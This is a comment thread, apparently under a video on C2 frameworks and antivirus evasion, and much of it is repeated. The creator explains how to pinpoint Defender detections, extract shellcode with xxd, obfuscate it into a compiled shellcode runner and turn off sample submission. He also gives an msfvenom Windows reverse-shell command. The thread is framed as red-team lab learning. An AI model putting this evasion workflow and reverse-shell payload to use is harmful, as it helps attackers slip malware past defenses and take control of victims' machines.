I flip flop between Metasploit, Powershell-Emipre, Villain, and Sliver. For improving my knowledge of the C2 or testing custom tooling, like evasion. Learning by tinkering with different C2 frameworks and seeing what works for you. Each framework has different pros and cons. If you are not sure what you want to try next. There is a large Google sheet of many different C2 frameworks The link to that can be found if you search for "The C2 Matrix" or find the link at howto.thec2matrix.com/
Hello thank you for the video, in my labs, I have the impression that defender catches the stager entering despite an aes encryption from stager-listener .. Anyone is in this situation? A solution?
I would suggest using tools like threat check or defender check to figure out what part of your payload is being flagged. Also if you're using a staged payload. It could be that the second stage is getting flagged instead. I'm not sure if the problem you are having is based on the first stage of the payload being catch by defender when dropped to disk or while it's running.
@@0reoByt3 I am caught during step 2 immediately after the beacon connection is established, step 1 is undetectable. I have however configured my listener with the aes encryption and the keys are on my csharp code of step one. Thank you for your feedback
@@0reoByt3 Oh I found the fault, it's the variables of my csharp code the problem, I would like to convert my csharp code into .bin in order to use my encrypter. Do you have an idea on this? Thank you
You can take compiled binaries and extract the shellocde and store it as a raw .bin file. But that's usually done when your processing just the shellcode of the payload with encryption or some other from of obfuscation.
The script just uses the xxd command to extract all the shellcode bytes of the desired payload in raw/data format. xxd -i file.bin Then does extra stuff to obfuscate, puts it into a simple shellcode runner, and compiles it into a .exe There are more ways than just xxd to extract the shellcode array of the payload. You can test this with msfvenom since sliver shellcode be to long to read unless you filter with the head command msfvenom -p windows/x64/shell_reverse_tcp -f raw lhost=eth0 lport=8443 -f msf_raw.bin xxd -i msf_bin
I would have to setup another Windows 11 Dev machine and try. Last time I tried to run 11 as a virtual machine it ran like junk. My Windows 10 box has updated version of windows defender and other signatures so I usually test with that. Of course disable to automatic sample submission and so on.
@@F0rc3Tv Some people had similar results with Windows 11. When Alh4zr3d was doing his lazy AV evasion stream months ago with just msfvenom tooling. He streamed on Windows 10 but was caught on Windows 11.
You explain everything so well, I was going to play around with the stagers myself and this video helps a ton.
Amazing work!
hello nice video bro, but i don't know wehere find the scripts remove_bad_strings.sh and ratoon_mod_csharp_runner.sh thanks a lot for the content.
What’s ur preferred best C2 im in between Mythic , Sliver , Havoc to start learning?
I flip flop between Metasploit, Powershell-Emipre, Villain, and Sliver.
For improving my knowledge of the C2 or testing custom tooling, like evasion.
Learning by tinkering with different C2 frameworks and seeing what works for you.
Each framework has different pros and cons.
If you are not sure what you want to try next. There is a large Google sheet of many different C2 frameworks
The link to that can be found if you search for "The C2 Matrix" or find the link at howto.thec2matrix.com/
Hello thank you for the video, in my labs, I have the impression that defender catches the stager entering despite an aes encryption from stager-listener .. Anyone is in this situation? A solution?
I would suggest using tools like threat check or defender check to figure out what part of your payload is being flagged.
Also if you're using a staged payload. It could be that the second stage is getting flagged instead.
I'm not sure if the problem you are having is based on the first stage of the payload being catch by defender when dropped to disk or while it's running.
@@0reoByt3 I am caught during step 2 immediately after the beacon connection is established, step 1 is undetectable. I have however configured my listener with the aes encryption and the keys are on my csharp code of step one. Thank you for your feedback
@@0reoByt3 Oh I found the fault, it's the variables of my csharp code the problem, I would like to convert my csharp code into .bin in order to use my encrypter. Do you have an idea on this? Thank you
@@0reoByt3 Update: my stage1 is undetectable, as soon as the connection is established I lose it 1 second later without Defender reporting a virus.
You can take compiled binaries and extract the shellocde and store it as a raw .bin file. But that's usually done when your processing just the shellcode of the payload with encryption or some other from of obfuscation.
Hi, how to convert data to exe ? Can you give me the script?
The script just uses the xxd command to extract all the shellcode bytes of the desired payload in raw/data format.
xxd -i file.bin
Then does extra stuff to obfuscate, puts it into a simple shellcode runner, and compiles it into a .exe
There are more ways than just xxd to extract the shellcode array of the payload. You can test this with msfvenom
since sliver shellcode be to long to read unless you filter with the head command
msfvenom -p windows/x64/shell_reverse_tcp -f raw lhost=eth0 lport=8443 -f msf_raw.bin
xxd -i msf_bin
@@0reoByt3 Thanks so much !
Wow 🎉
this works on windows 11 aswell i guess?
I would have to setup another Windows 11 Dev machine and try. Last time I tried to run 11 as a virtual machine it ran like junk. My Windows 10 box has updated version of windows defender and other signatures so I usually test with that. Of course disable to automatic sample submission and so on.
@@0reoByt3 ah nice. tho i follow this guide but didnt reallyy work. not sure why tho
@@F0rc3Tv Some people had similar results with Windows 11. When Alh4zr3d was doing his lazy AV evasion stream months ago with just msfvenom tooling. He streamed on Windows 10 but was caught on Windows 11.
@@F0rc3Tv There always more research that can be done.
@@0reoByt3 yeah ofc